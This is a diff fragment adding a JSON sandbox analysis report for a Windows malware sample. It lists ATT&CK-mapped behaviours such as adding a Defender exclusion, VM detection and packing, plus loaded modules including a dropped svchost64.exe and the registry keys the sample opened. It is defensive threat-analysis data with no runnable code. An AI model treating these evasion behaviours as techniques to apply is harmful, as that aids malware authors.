+        "severity": "INFO"
+      }
+    ],
+    "T1562.001": [
+      {
+        "description": "Creates guard pages, often used to prevent reverse engineering and debugging",
+        "severity": "INFO"
+      },
+      {
+        "description": "Adds a directory exclusion to Windows Defender",
+        "severity": "LOW"
+      }
+    ],
+    "T1543.003": [
+      {
+        "description": "Creates or modifies windows services",
+        "severity": "INFO"
+      }
+    ],
+    "T1497": [
+      {
+        "description": "May sleep (evasive loops) to hinder dynamic analysis",
+        "severity": "INFO"
+      },
+      {
+        "description": "Contains capabilities to detect virtual machines",
+        "severity": "INFO"
+      },
+      {
+        "description": "Contains long sleeps (>= 3 min)",
+        "severity": "INFO"
+      }
+    ],
+    "T1027.002": [
+      {
+        "description": "Binary may include packed or crypted data",
+        "severity": "INFO"
+      },
+      {
+        "description": "PE file has an executable .text section which is very likely to contain packed code (zlib compression ratio < 0.3)",
+        "severity": "INFO"
+      }
+    ],
+    "T1027": [
+      {
+        "description": ".NET source code contains long base64-encoded strings",
+        "severity": "INFO"
+      },
+      {
+        "description": "Binary may include packed or crypted data",
+        "severity": "INFO"
+      }
+    ],
+    "T1082": [
+      {
+        "description": "Queries the cryptographic machine GUID",
+        "severity": "INFO"
+      },
+      {
+        "description": "Reads software policies",
+        "severity": "INFO"
+      },
+      {
+        "description": "Queries a list of all running drivers",
+        "severity": "INFO"
+      },
+      {
+        "description": "Queries the volume information (name, serial number etc) of a device",
+        "severity": "INFO"
+      }
+    ],
+    "T1547.008": [
+      {
+        "description": "Spawns drivers",
+        "severity": "INFO"
+      }
+    ]
+  },
+  "text_highlighted": [
+    "C:\\Windows\\system32\\cmd.exe"
+  ],
+  "modules_loaded": [
+    "%SAMPLEPATH%\\03bd9a94482f180bb047626cb2f27ccf8daa0e201345480b43585580e09c311b.exe",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\999d72a4e033bba86d05407570c67cba\\System.Management.Automation.ni.dll",
+    "%USERPROFILE%\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Windows\\System32\\wbem\\wmiutils.dll",
+    "ADVAPI32.dll",
+    "api-ms-win-core-synch-l1-2-0",
+    "api-ms-win-core-fibers-l1-1-1",
+    "kernel32",
+    "api-ms-win-core-localization-l1-2-1",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll",
+    "SHLWAPI.dll",
+    "api-ms-win-appmodel-runtime-l1-1-2.dll",
+    "api-ms-win-appmodel-runtime-l1-1-0.dll",
+    "VERSION.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
+    "USER32.dll",
+    "api-ms-win-core-quirks-l1-1-0.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoree.dll",
+    "mscoree.dll",
+    "ntdll",
+    "C:\\Windows\\system32\\combase.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ole32.dll",
+    "ole32.dll",
+    "CRYPTBASE.dll",
+    "api-ms-win-core-xstate-l2-1-0.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\nlssorting.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll",
+    "bcrypt.dll",
+    "shell32.dll",
+    "API-MS-Win-Security-SDDL-L1-1-0.dll",
+    "profapi.dll",
+    "kernel32.dll",
+    "CRYPTSP.dll",
+    "C:\\Windows\\system32\\rsaenh.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll",
+    "oleaut32.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\b0fcf106681758b7af5211cc1367fc8e\\Microsoft.PowerShell.ConsoleHost.ni.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\OLEAUT32.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\08a991e54142198a258c6c3824708d25\\System.Management.Automation.ni.dll",
+    "ntdll.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en-US\\mscorrc.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\en\\mscorrc.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll",
+    "psapi.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\amsi.dll",
+    "amsi.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ntdll.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\wintrust.dll",
+    "wintrust.dll",
+    "MSISIP.DLL",
+    "C:\\Windows\\system32\\CRYPT32.dll",
+    "imm32.dll",
+    "C:\\Windows\\system32\\wshext.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll",
+    "C:\\Windows\\system32\\tzres.dll",
+    "C:\\Windows\\system32\\en-US\\tzres.dll.mui",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\7bed49c46de9295a8453db205c60a028\\System.Data.ni.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\b221af81285c1305324612e6dc9c88ff\\System.Management.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\8ad4c0af5b3d51a0f3a4dac0d44d85d4\\System.DirectoryServices.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\a51f82e48c6af5e2b5757b12ffccc080\\Microsoft.PowerShell.Security.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Transactions\\604272b0faec2e09d53d38e03bc89c6c\\System.Transactions.ni.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll",
+    "secur32.dll",
+    "SspiCli.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\4beb1eeca20b27d4bd1bb9880f03cc2a\\System.Configuration.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\cbac94f54441f8c7adbe6d607f8fe13b\\Microsoft.Management.Infrastructure.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Numerics\\86cfd69ce1261baf4740e7606cade014\\System.Numerics.ni.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\shlwapi.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.CSharp\\d011b632ffdc7e7df171eee4a06fcd05\\Microsoft.CSharp.ni.dll",
+    "API-MS-Win-Security-LSALookup-L1-1-0.dll",
+    "RpcRtRemote.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\7fa69cfcdc7bf493079cf9bef94bcfc6\\Microsoft.Management.Infrastructure.Native.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\5a33d70bf597090b1f9f55984c2a8778\\Microsoft.PowerShell.Commands.Management.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Confe64a9051#\\120a0532577f871c2415502d9edacdd6\\System.Configuration.Install.ni.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\urlmon.dll",
+    "api-ms-win-downlevel-advapi32-l1-1-0.dll",
+    "urlmon.dll",
+    "API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL",
+    "api-ms-win-downlevel-advapi32-l2-1-0.dll",
+    "ncrypt.dll",
+    "C:\\Windows\\system32\\bcryptprimitives.dll",
+    "USERENV.dll",
+    "GPAPI.dll",
+    "API-MS-WIN-Service-Management-L1-1-0.dll",
+    "API-MS-WIN-Service-Management-L2-1-0.dll",
+    "C:\\Windows\\system32\\cryptnet.dll",
+    "cryptnet.dll",
+    "SensApi.dll",
+    "RPCRT4.dll",
+    "WINHTTP.dll",
+    "WS2_32.dll",
+    "credssp.dll",
+    "C:\\Windows\\system32\\mswsock.dll",
+    "C:\\Windows\\System32\\wshtcpip.dll",
+    "C:\\Windows\\System32\\wship6.dll",
+    "IPHLPAPI.DLL",
+    "dhcpcsvc6.DLL",
+    "dhcpcsvc.DLL",
+    "NSI.dll",
+    "CFGMGR32.dll",
+    "API-MS-WIN-Service-winsvc-L1-1-0.dll",
+    "DNSAPI.dll",
+    "rasadhlp.dll",
+    "C:\\Windows\\System32\\fwpuclnt.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\crypt32.dll",
+    "crypt32.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\CRYPT32.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\diasymreader.dll",
+    "GDI32.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll",
+    "propsys.dll",
+    "comctl32.dll",
+    "apphelp.dll",
+    "CLBCatQ.DLL",
+    "C:\\Windows\\System32\\ieframe.dll",
+    "API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
+    "SETUPAPI.dll",
+    "C:\\Windows\\system32\\propsys.dll",
+    "ntmarta.dll",
+    "C:\\Windows\\system32\\urlmon.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.IO.Cb3b124c8#\\1e72628c6f64bbea2f27e20f9f2cf3b4\\System.IO.Compression.ni.dll",
+    "C:\\Windows\\system32\\schtasks.exe",
+    "C:\\Windows\\system32\\taskschd.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\\\wminet_utils.dll",
+    "C:\\Windows\\system32\\wbem\\wmiutils.dll",
+    "C:\\Windows\\system32\\wbem\\wbemprox.dll",
+    "C:\\Windows\\system32\\wbem\\wbemsvc.dll",
+    "C:\\Windows\\system32\\wbem\\fastprox.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll",
+    "rasapi32.dll",
+    "rtutils.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll",
+    "RASMAN.DLL",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\secur32.dll",
+    "C:\\Windows\\system32\\schannel.DLL"
+  ],
+  "registry_keys_opened": [
+    "HKLM\\Software\\Microsoft\\.NETFramework\\Policy",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\Policy\\v4.0",
+    "HKLM\\Software\\Microsoft\\.NETFramework",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\InstallRoot",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\CLRLoadLogDir",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\UseLegacyV2RuntimeActivationPolicyDefaultValue",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\OnlyUseLatestCLR",
+    "HKCU\\Software\\Microsoft\\.NETFramework\\Policy\\Standards",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\Policy\\Standards\\v4.0.30319",
+    "HKLM\\SOFTWARE\\Microsoft\\Fusion",
+    "HKLM\\SOFTWARE\\Microsoft\\Fusion\\NoClientChecks",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\v4.0.30319\\SKUs",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\v4.0.30319\\SKUs\\default",
+    "HKLM\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full",
+    "HKLM\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\Release",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\DisableConfigCache",
+    "HKLM\\Software\\Microsoft\\Fusion",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\itami.exe",
+    "HKLM\\Software\\Microsoft\\Fusion\\CacheLocation",
+    "HKLM\\Software\\Microsoft\\Fusion\\DownloadCacheQuotaInKB",
+    "HKLM\\Software\\Microsoft\\Fusion\\EnableLog",
+    "HKLM\\Software\\Microsoft\\Fusion\\LoggingLevel",
+    "HKLM\\Software\\Microsoft\\Fusion\\ForceLog",
+    "HKLM\\Software\\Microsoft\\Fusion\\LogFailures",
+    "HKLM\\Software\\Microsoft\\Fusion\\LogResourceBinds",
+    "HKLM\\Software\\Microsoft\\Fusion\\FileInUseRetryAttempts",
+    "HKLM\\Software\\Microsoft\\Fusion\\FileInUseMillisecondsBetweenRetries",
+    "HKLM\\Software\\Microsoft\\Fusion\\UseLegacyIdentityFormat",
+    "HKLM\\Software\\Microsoft\\Fusion\\DisableMSIPeek",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DevOverrideEnable",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\NGen\\Policy\\v4.0",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\NGen\\Policy\\v4.0\\OptimizeUsedBinaries",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\Servicing",
+    "HKLM\\Software\\Microsoft\\StrongName",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\UseRyuJIT",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\FeatureSIMD",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\Latest",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\index24",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\LegacyPolicyTimeStamp",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Configuration__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Xml__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Xml__b77a5c561934e089",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\APTCA",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList\\S-1-5-21-3711686801-687107597-1149503783-1001",
+    "HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\AppContext",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\\PowerShellVersion",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\\RuntimeVersion",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\\ConsoleHostAssemblyName",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Control\\MiniNT",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3",
+    "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine\\NetFrameworkV4IsInstalled",
+    "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\powershell.exe",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.System.Management.Automation__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.System.Management.Automation__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Configuration.Install__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Core__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Core__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Numerics__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Numerics__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Security__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.1.0.Microsoft.Management.Infrastructure__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Transactions__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Transactions__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.DirectoryServices__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.1.0.Microsoft.Management.Infrastructure.Native__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Runtime.Serialization__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Runtime.Serialization__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Management__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Management__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Data__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Data__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.Microsoft.CSharp__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.SMDiagnostics__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.SMDiagnostics__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\.NETFramework\\HillClimbing_TargetSignalToNoiseRatio",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.System.Management.Automation.resources_en-US_31bf3856ad364e35",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-3711686801-687107597-1149503783-1001\\Installer\\Assemblies\\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe",
+    "HKCU\\Software\\Microsoft\\Installer\\Assemblies\\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe",
+    "HKLM\\SOFTWARE\\Classes\\Installer\\Assemblies\\C:|Windows|System32|WindowsPowerShell|v1.0|powershell.exe",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\Managed\\S-1-5-21-3711686801-687107597-1149503783-1001\\Installer\\Assemblies\\Global",
+    "HKCU\\Software\\Microsoft\\Installer\\Assemblies\\Global",
+    "HKLM\\SOFTWARE\\Classes\\Installer\\Assemblies\\Global",
+    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN",
+    "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\ServiceStackVersion",
+    "HKLM\\Software\\Microsoft\\PowerShell\\3\\PowerShellEngine",
+    "HKLM\\Software\\Microsoft\\PowerShell\\3\\PowerShellEngine\\ApplicationBase",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35",
+    "HKLM\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription",
+    "HKCU\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\TZI",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\Dynamic DST",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\Dynamic DST\\FirstEntry",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\Dynamic DST\\LastEntry",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\Dynamic DST\\2006",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\Dynamic DST\\2007",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\MUI_Display",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\MUI_Std",
+    "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\Pacific Standard Time\\MUI_Dlt",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Runtime.Caching__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.EnterpriseServices__b03f5f7f11d50a3a",
+    "HKLM\\SOFTWARE\\Microsoft\\BidInterface\\Loader",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.4.0.System.Data.SqlXml__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.4.0.System.Data.SqlXml__b77a5c561934e089",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.10.0.Microsoft.JScript__b03f5f7f11d50a3a",
+    "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment",
+    "HKLM\\System\\CurrentControlSet\\Control\\Session Manager\\Environment\\PSMODULEPATH",
+    "HKCU\\Environment",
+    "HKCU\\Environment\\PSMODULEPATH",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\v4.0_policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35",
+    "HKLM\\Software\\Microsoft\\Fusion\\PublisherPolicy\\Default\\policy.3.0.Microsoft.PowerShell.Security__31bf3856ad364e35",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Application\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\HardwareEvents\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Internet Explorer\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Key Management Service\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Media Center\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Security\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\\PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell",
+    "HKLM\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\Windows PowerShell\\PowerShell",
+    "HKCU\\Control Panel\\International",
+    "HKCU\\Control Panel\\International\\sYearMonth",
